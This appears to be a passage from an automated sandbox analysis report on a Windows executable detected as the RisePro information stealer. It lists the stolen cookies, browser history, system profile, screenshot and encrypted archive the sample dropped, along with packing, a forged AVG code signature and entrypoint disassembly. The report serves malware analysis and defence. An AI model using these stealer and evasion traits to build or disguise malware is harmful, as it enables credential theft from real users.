                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5..........."...0.............~2... ........@.. .......................@............`.................................,2..O............................ .......1..8............................................ ............... ..H............text...H.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................`2......H........$.................................................................]*....0..#.........i. .......... .............+B.....- ....d....(....(...............+.......(...........o......X.. ....2.....+7. ....... ..............XX.. ....]...................X.. ....2........+f...+T..X ....].....X ....]...........&...................X ....]..........%G....a.R...X......i2....X.....2.*...................(....*n .........%.....(.........*.0..H.........89.....P......%G ....X.R.P....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\y_CqgZq8h7seWeb Data

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):106496
                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\trixyBzNJzauM1END\Cookies\Chrome_Default.txt

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:ASCII text, with very long lines (769), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6085
                                                                                                                                            Entropy (8bit):6.038274200863744
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:gxsumX/xKO2KbcRfbZJ5Jxjxcx1xcbza5BC126oxgxA26Fxr/CxbTxqCGYURxOeb:gWFXZQHRFJ5Pts7c3avC126Ygb6Lr/WY
                                                                                                                                            MD5:ACB5AD34236C58F9F7D219FB628E3B58
                                                                                                                                            SHA1:02E39404CA22F1368C46A7B8398F5F6001DB8F5C
                                                                                                                                            SHA-256:05E5013B848C2E619226F9E7A084DC7DCD1B3D68EE45108F552DB113D21B49D1
                                                                                                                                            SHA-512:5895F39765BA3CEDFD47D57203FD7E716347CD79277EDDCDC83A729A86E2E59F03F0E7B6B0D0E7C7A383755001EDACC82171052BE801E015E6BF7E6B9595767F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.google.com.TRUE./.TRUE.1712145003.NID.ENC893*_djEw3+k+F2A/rK1XOX2BXUq6pY2LBCOzoXODiJnrrvDbDsPWiYwKZowg9PxHqkTm37HpwC52rXpnuUFrQMpV3iKtdSHegOm+XguZZ6tGaCY2hGVyR8JgIqQma1WLXyhCiWqjou7/c3qSeaKyNoUKHa4TULX4ZnNNtXFoCuZcBAAy4tYcz+0BF4j/0Pg+MgV+s7367kYcjO4q3zwc+XorjSs7PlgWlYrcc55rCJplhJ+H13M00HIdLm+1t9PACck2xxSWX2DsA61sEDJCHEc=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=*..support.microsoft.com.FALSE./.TRUE.1696413835..AspNetCore.AuthProvider.ENC893*_djEwVWJCCNyFkY3ZM/58ZZ/F/bz9H1yPvi6FOaroXC+KU8E=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=*..support.microsoft.com.TRUE./signin-oidc.TRUE.1696414135..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.ENC893*_djEwBAKLrkJs5PZ6BD7Beoa9N/bOSh5JtRch10gZT+E=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=*..support.microsoft.com.TRUE./signin-oidc.TRUE.1696414135..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkH

                                                                                                                                            C:\Users\user\AppData\Local\Temp\trixyBzNJzauM1END\History\Firefox_fqs92o4p.default-release.txt

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):112
                                                                                                                                            Entropy (8bit):4.911305722693245
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:N8DSLvIJiMgTE2WdkQUl7R8DSLvIJiMhKVX3L2WdkQUlv:2OLciodq7R8OLciA8dqv
                                                                                                                                            MD5:978B9515D3688A43726604AC169DF379
                                                                                                                                            SHA1:D61293AB99332FC45CAE37D78AB17A5DA5BCD189
                                                                                                                                            SHA-256:CDEF3FB1CE312E4B67DC5F1B1F9FB551241C08564FDB26AFA4CBF448BB02EA65
                                                                                                                                            SHA-512:86146AA576129B73743B1EBC0BC60880FDA58A11498048B3C68284C4520F1ADC324D016696B0E995A51AC56966E0F38B0AF12458A986868701C6AAAA89C829CB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:https://www.mozilla.org/privacy/firefox/.1696333827..https://www.mozilla.org/en-US/privacy/firefox/.1696333827..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\trixyBzNJzauM1END\information.txt

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6914
                                                                                                                                            Entropy (8bit):5.538802664713034
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:xHThevAtphWhcmzMwpJCViRE7fNeIj5bATi0elPnPosdlFk3yF4SH892bWdHR4iw:LevAtfWhcmzMwpJCViC7fNeIj5bATi02
                                                                                                                                            MD5:E11B4C48E5DA979A2DBA80ACBECB936D
                                                                                                                                            SHA1:88002EC30400E4665B308B33263EE74F9D7E3CA9
                                                                                                                                            SHA-256:9EB4668F21E2CE2E260507367B0AB33F44C95D938283842C4C76BF940784F281
                                                                                                                                            SHA-512:70D9FA7BDFC25BABF785F4C1A56F09C4EBA5BD4A6A7E3B06296F4095CDA55D72F22948BFCD05CE7207CBED6B412EF7FDDDE8C2F3C771AAF30533D83B3559B3B1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:Build: default..Version: 1.9....Date: Sun Apr 21 15:31:16 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: a4627d919c89b35480f35a8f8ec1ed66....Path: C:\Users\user\Desktop\2q45IEa3Ee.exe..Work Dir: C:\Users\user\AppData\Local\Temp\trixyBzNJzauM1END....IP: 81.181.57.52..Location: US, Atlanta..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 675052 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 21/4/2024 15:31:16..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [324]..csrss.exe [408]..wininit.exe [484]..csrss.exe [492]..winlogon.exe [552]..services.exe [620]..lsass.exe [628]..svchost.exe [752]..fontdrvhost.exe [776]..fontdrvhost.exe [7

                                                                                                                                            C:\Users\user\AppData\Local\Temp\trixyBzNJzauM1END\passwords.txt

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4897
                                                                                                                                            Entropy (8bit):2.518316437186352
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                                                                                                                                            MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                                                                                                                                            SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                                                                                                                                            SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                                                                                                                                            SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\trixyBzNJzauM1END\screenshot.png

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):713144
                                                                                                                                            Entropy (8bit):7.92643296641108
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:CILYYlSXNXiRrDNiydLWO3X6jV/zF0lpgmnEhSiJ/DCIObusXc26cJRvzDPer/:jfl2ZOiy/+pMpmlJLVu/Pzvzry
                                                                                                                                            MD5:C23146B8783F0773242D52E3A3708FD1
                                                                                                                                            SHA1:AC3A28D6F1F56C8B6F07881CC9235FB3FFF24267
                                                                                                                                            SHA-256:B9040135EE594583D255A4A23726CB7B8EE4A8EA3066CD4E6182392AAF2F58DC
                                                                                                                                            SHA-512:122CD8FC1BE913D5CE7E61394D31BB902D42F2AC8AF14515309C3882A1CBAB81925D1DBB1934141DF848A1A2ADB7D8A915AE1FA30401742B66C1D6A45DCD201E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....eG....Y^=kf..|.......^Ow..Zo.4=...{/T..HB.FBB^%..A...........cJ..d.I A|....O.....YY.Yk.VD.....)...;.i...U.-.u......&..:......Z..=.1e._...i.s.S_.D.Yd..m.5JfbO..)..O~9...R..b.@..K....:..b.+1./..b8..Jk...1v.x.'..l....;u..<...+.G=..}l..|v ..:./=.06M.?=-....r.#...'.b.....M.s.5....4...&.>....$l.....=...g.i.;......)..oy...b..S.....d.`.?....7...>ny....6...7.>f.e..G.....1c.~ 3....}....?.)s4V..C{........c{.;...i....I.yO{....]i...M..3..=..}....}..(.^.|..........c.;...o.q.k...V1ow...?`{.0.<.w.=...w4.E..'-......4....b.......9.`....],gg...Nv..oKc;....Z......b.f1.....w.#-.....'fy...~k.....q...M...1..m.q...-i...o...mmn..2.olb.v.#-......].............om........O.k`....kY....7...2...~--1...g]`....7.Vc..me.oa{ny].10..........6.&3...6&.......g.<bc.....7.6.m|M./.... ....f............7.5...&..Z..mly.^..7..Z....q.E..wn1.O.......U9....9.\].k1..i..6...,F..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\uw5Stgma3gbM9Xo4g_6cCoQ.zip

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):701222
                                                                                                                                            Entropy (8bit):7.997879344269176
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:12288:aQRKzFgKQG4f92eGO90/+SHpqRK8Du2GMSsfL8JpgRT7Cd:aQUcGW9VB90m0YgqZJ5087Cd
                                                                                                                                            MD5:8CE396483EFAD54B995C90DA730CE355
                                                                                                                                            SHA1:A62384D1F493FADFDA7648E22BE70C7FC00EE571
                                                                                                                                            SHA-256:B0F4FF756AA89245AD373B36EBF05B4774FB7E37E232FA142F9F912A94B9C296
                                                                                                                                            SHA-512:1C362EF2CCE749FC79A6D457A8B1259F3CF2F9AEF97BF5147855F43BA6B5A732709DCFDA80A96D17FC133C8F864A1974F35990F87245B643E4C275B0CDFDCF88
                                                                                                                                            Malicious:true
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\uw5Stgma3gbM9Xo4g_6cCoQ.zip, Author: Joe Security
                                                                                                                                            Preview:PK.........{.X................Cookies\..PK.........{.XQn.+............Cookies\Chrome_Default.txt.G..r...U.#.5C.....s$..-.D...7.\..$.G.)o....:....Z.C.f_..pm............"..t..t....}.k.@...a.2+P`.0.x.>....s..k%.._..b..P..((......B.....`.7..-m..JY..F....E.*.l.....I..&.....<J..M.......,V...)b.....Q..k......M?.5L....h}......X..'.0..tB.G...\;.a....4.......B4.......J.4.6.y:....4.-.UfE...3A*p.U5UX....Z.g:*e.j.C..Bw..........e..a^.vU:....$..U......B..`._.e.....+...9.{u...7.e...H.]02...%yR".0...x...P<..N....R.}....{.G...;..c..x...kw.'S>.d|.....B..k.9.t.!>.rh...~n.[....s#/....`.!..Kb8%&.vZB`....O|.....>K......L*...d0..03..t...T&.......`N.xp.."..J.......Q.....c..5...).Z.91.6.j..G.....Wr...a.52!..(^.U.....6....dB.D.^...7..0H.\J9.H.$^`e"..d...\....B.8Z=.qeP.3Y.>..'W.X..T..>z...,..K......g....%B.w4#...;.[]u|....v...3.;L..U?..b.....u..*..... .......F...P.a...|R*3.=......r.:.64...#D..^..>.A..ZT.]E........t...f...1..3.....`...X.....C.]%...p.p.ym

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):7.655592549419492
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:2q45IEa3Ee.exe
                                                                                                                                            File size:2'551'616 bytes
                                                                                                                                            MD5:4a36fa7c0ccbc6842c541a6439ab545a
                                                                                                                                            SHA1:9257009dd59ac4db2518293bcd46be058d937284
                                                                                                                                            SHA256:ca9b2380df90ac17d8c042db4ab442ffad68cc52cd2e557d855f7d571469198f
                                                                                                                                            SHA512:13ef8cf5b3add3445e71f1f1d6047eb571a6ccc439e5bbe63b9a29299ca01030ae8cd1b8b4cbab2cda05936e22e894097744f5e8c77b8149b5c975a707506a77
                                                                                                                                            SSDEEP:49152:p2eDXH3Qb21TmkaSL8sUEFr+mZgl+a2kx+aan/RQTUJN:fD3l1CkaQ8sUEFCmZPa+aIRQW
                                                                                                                                            TLSH:92C501323BFA8BBAE5CACA30DD6FD6A0C5403C96F46646911589B57E12F04DD0B4E4E3
                                                                                                                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......j.....s...s...s.e.p.%.s.e.v...s.e.t./.s..y..*.s..yw.=.s..yp.4.s..yv.u.s.e.w.6.s.e.u./.s.e.r.5.s...r...s..zz.2.s..z../.s...../.s

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:7ffbf3bb3b299455

                                                                                                                                            Static PE Info

                                                                                                                                            General

                                                                                                                                            Entrypoint:0x994f20
                                                                                                                                            Entrypoint Section:.boot
                                                                                                                                            Digitally signed:true
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x6624C730 [Sun Apr 21 07:58:40 2024 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:6
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:6
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:6
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:63814aaf116ba6abb6496ce4bcad24c6

                                                                                                                                            Authenticode Signature

                                                                                                                                            Signature Valid:false
                                                                                                                                            Signature Issuer:CN=AVG Technologies USA LLC \u2122\u2030\u2122\u2030\u2122\u2030
                                                                                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                            Error Number:-2146762487
                                                                                                                                            Not Before, Not After
                                                                                                                                            • 06/01/2024 10:14:42 07/01/2034 10:14:42
                                                                                                                                            Subject Chain
                                                                                                                                            • CN=AVG Technologies USA LLC \u2122\u2030\u2122\u2030\u2122\u2030
                                                                                                                                            Version:3
                                                                                                                                            Thumbprint MD5:27F5DD79C86B9255242DDB29A51B691E
                                                                                                                                            Thumbprint SHA-1:44268FBAA5D87BA1717C7237701B06FA20E9AF66
                                                                                                                                            Thumbprint SHA-256:1C39A7BBBC7445339DEFD55E21DFA65CDEB9037F0FD33140759077C31CB40BE0
                                                                                                                                            Serial:59AE1233E1806897438DF0EEC7051E17

                                                                                                                                            Entrypoint Preview

                                                                                                                                            Instruction
                                                                                                                                            call 00007F9518BDB0A0h
                                                                                                                                            push ebx
                                                                                                                                            mov ebx, esp
                                                                                                                                            push ebx
                                                                                                                                            mov esi, dword ptr [ebx+08h]
                                                                                                                                            mov edi, dword ptr [ebx+10h]
                                                                                                                                            cld
                                                                                                                                            mov dl, 80h
                                                                                                                                            mov al, byte ptr [esi]
                                                                                                                                            inc esi
                                                                                                                                            mov byte ptr [edi], al
                                                                                                                                            inc edi
                                                                                                                                            mov ebx, 00000002h
                                                                                                                                            add dl, dl
                                                                                                                                            jne 00007F9518BDAF57h
                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                            inc esi
                                                                                                                                            adc dl, dl
                                                                                                                                            jnc 00007F9518BDAF3Ch
                                                                                                                                            add dl, dl
                                                                                                                                            jne 00007F9518BDAF57h
                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                            inc esi
                                                                                                                                            adc dl, dl
                                                                                                                                            jnc 00007F9518BDAFA3h
                                                                                                                                            xor eax, eax
                                                                                                                                            add dl, dl
                                                                                                                                            jne 00007F9518BDAF57h
                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                            inc esi
                                                                                                                                            adc dl, dl
                                                                                                                                            jnc 00007F9518BDB037h
                                                                                                                                            add dl, dl
                                                                                                                                            jne 00007F9518BDAF57h
                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                            inc esi
                                                                                                                                            adc dl, dl
                                                                                                                                            adc eax, eax
                                                                                                                                            add dl, dl
                                                                                                                                            jne 00007F9518BDAF57h
                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                            inc esi
                                                                                                                                            adc dl, dl
                                                                                                                                            adc eax, eax
                                                                                                                                            add dl, dl
                                                                                                                                            jne 00007F9518BDAF57h
                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                            inc esi
                                                                                                                                            adc dl, dl
                                                                                                                                            adc eax, eax
                                                                                                                                            add dl, dl
                                                                                                                                            jne 00007F9518BDAF57h
                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                            inc esi
                                                                                                                                            adc dl, dl
                                                                                                                                            adc eax, eax
                                                                                                                                            je 00007F9518BDAF5Ah
                                                                                                                                            push edi
                                                                                                                                            mov eax, eax
                                                                                                                                            sub edi, eax
                                                                                                                                            mov al, byte ptr [edi]
                                                                                                                                            pop edi
                                                                                                                                            mov byte ptr [edi], al
                                                                                                                                            inc edi
                                                                                                                                            mov ebx, 00000002h
                                                                                                                                            jmp 00007F9518BDAEEBh
                                                                                                                                            mov eax, 00000001h
                                                                                                                                            add dl, dl
                                                                                                                                            jne 00007F9518BDAF57h
                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                            inc esi
                                                                                                                                            adc dl, dl
                                                                                                                                            adc eax, eax
                                                                                                                                            add dl, dl
                                                                                                                                            jne 00007F9518BDAF57h
                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                            inc esi
                                                                                                                                            adc dl, dl
                                                                                                                                            jc 00007F9518BDAF3Ch
                                                                                                                                            sub eax, ebx
                                                                                                                                            mov ebx, 00000001h
                                                                                                                                            jne 00007F9518BDAF7Ah
                                                                                                                                            mov ecx, 00000001h
                                                                                                                                            add dl, dl
                                                                                                                                            jne 00007F9518BDAF57h
                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                            inc esi
                                                                                                                                            adc dl, dl
                                                                                                                                            adc ecx, ecx
                                                                                                                                            add dl, dl
                                                                                                                                            jne 00007F9518BDAF57h
                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                            inc esi
                                                                                                                                            adc dl, dl
                                                                                                                                            jc 00007F9518BDAF3Ch
                                                                                                                                            push esi
                                                                                                                                            mov esi, edi
                                                                                                                                            sub esi, ebp

                                                                                                                                            Data Directories

                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x20e18b0x184.idata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x18a0000x7af22.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x26c2100x2d30.themida
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x6f40000x10.reloc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x20f0180x18.tls
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x17fa500x40
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                            Sections

                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            0x10000x160f480x808001fde0b2f9ba826eb7bb1f3755e4aba55False0.9998214068579766data7.999554529460661IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            0x1620000x1f1b00xa600cf9194a21763b6043afa5ffc0c1449eaFalse0.9965173192771084data7.99286776832715IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            0x1820000x72d00x16001c099bc9e477f548ffb964f3a4981bdbFalse0.9872159090909091data7.929091727373002IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .rsrc0x18a0000x7af220x7b0004c7fc19900ceba159cbed52fc4994937False0.301587112550813data5.082689501285179IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            0x2050000x82500x48000d417506eb649535b78e0dbb1056624dFalse0.9876844618055556data7.963276296922511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                            .idata0x20e0000x10000x400292e24cf2ac1571d429d8e1f1937f1e5False0.4013671875data3.4435698831363544IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .tls0x20f0000x10000x200c98d956a508fa697ee774bd4ad91e4abFalse0.056640625data0.18120187678200297IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .themida0x2100000x3840000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .boot0x5940000x15fc000x15fc003f280db0b72bf0de9235379a1f9fe774False0.9848233719793887data7.949677127496007IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            .reloc0x6f40000x10000x10b09d3d350176315db5dfc472dbeca20dFalse1.5GLS_BINARY_LSB_FIRST2.349601752714581IMAGE_SCN_MEM_READ

                                                                                                                                            Resources

                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                            REGINST0x18a9700x33dWindows setup INFormationEnglishUnited States0.4487334137515078
                                                                                                                                            RTKICON0x18acb00x4780eMS Windows icon resource - 7 icons, 48x48, 8 bits/pixel, 32x32, 8 bits/pixelEnglishUnited States0.1045008501833528
                                                                                                                                            SETUPSERVICE_WIN70x1d24c00x6000PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS WindowsEnglishUnited States0.20174153645833334
                                                                                                                                            SETUPSERVICE_WIN80x1d84c00x2a00PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS WindowsEnglishUnited States0.46000744047619047
                                                                                                                                            RT_ICON0x1daec00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.7686170212765957
                                                                                                                                            RT_ICON0x1db3280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.6163227016885553
                                                                                                                                            RT_ICON0x1dc3d00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.43521530817461257
                                                                                                                                            RT_ICON0x1ecbf80x118c7PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0004312803461373
                                                                                                                                            RT_MENU0x1fe4c00x357cdata0.22509494595384166
                                                                                                                                            RT_MENU0x201a3c0x8edata0.5352112676056338
                                                                                                                                            RT_MENU0x201acc0x1fedata0.37254901960784315
                                                                                                                                            RT_MENU0x201ccc0x190data0.38
                                                                                                                                            RT_MENU0x201e5c0x7a2data0.2656090071647902
                                                                                                                                            RT_MENU0x2026000x25cdata0.3509933774834437
                                                                                                                                            RT_MENU0x20285c0x7cedataKoreanNorth Korea0.1981981981981982
                                                                                                                                            RT_MENU0x20285c0x7cedataKoreanSouth Korea0.1981981981981982
                                                                                                                                            RT_MENU0x20302c0x86data0.5522388059701493
                                                                                                                                            RT_MENU0x2030b40x88data0.5220588235294118
                                                                                                                                            RT_MENU0x20313c0x64data0.64
                                                                                                                                            RT_MENU0x2031a00xbadata0.478494623655914
                                                                                                                                            RT_MENU0x20325c0x126data0.4387755102040816
                                                                                                                                            RT_MENU0x2033840xa4data0.5304878048780488
                                                                                                                                            RT_MENU0x2034280x28data1.0
                                                                                                                                            RT_MENU0x2034500x9cdata0.5576923076923077
                                                                                                                                            RT_MENU0x2034ec0x74data0.6724137931034483
                                                                                                                                            RT_MENU0x2035600xcedata0.46601941747572817
                                                                                                                                            RT_MENU0x2036300xd6data0.5747663551401869
                                                                                                                                            RT_MENU0x2037080x80data0.7109375
                                                                                                                                            RT_MENU0x2037880x24data1.0833333333333333
                                                                                                                                            RT_MENU0x2037ac0x26data1.0263157894736843
                                                                                                                                            RT_MENU0x2037d40x11cdata0.30633802816901406
                                                                                                                                            RT_MENU0x2038f00x76data0.635593220338983
                                                                                                                                            RT_MENU0x2039680xe6data0.4434782608695652
                                                                                                                                            RT_MENU0x203a500x142data0.4192546583850932
                                                                                                                                            RT_MENU0x203b940x18adata0.3756345177664975
                                                                                                                                            RT_MENU0x203d200xc6data0.5404040404040404
                                                                                                                                            RT_MENU0x203de80x19cdata0.2621359223300971
                                                                                                                                            RT_MENU0x203f840x142data0.42857142857142855
                                                                                                                                            RT_MENU0x2040c80x18adata0.38071065989847713
                                                                                                                                            RT_MENU0x2042540xb4data0.4111111111111111
                                                                                                                                            RT_MENU0x2043080x122data0.296551724137931
                                                                                                                                            RT_GROUP_ICON0x20442c0x3edata0.7903225806451613
                                                                                                                                            RT_VERSION0x20446c0x3ccdataEnglishUnited States0.3950617283950617
                                                                                                                                            RT_MANIFEST0x2048380x6eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminatorsEnglishUnited States0.41694915254237286

                                                                                                                                            Imports

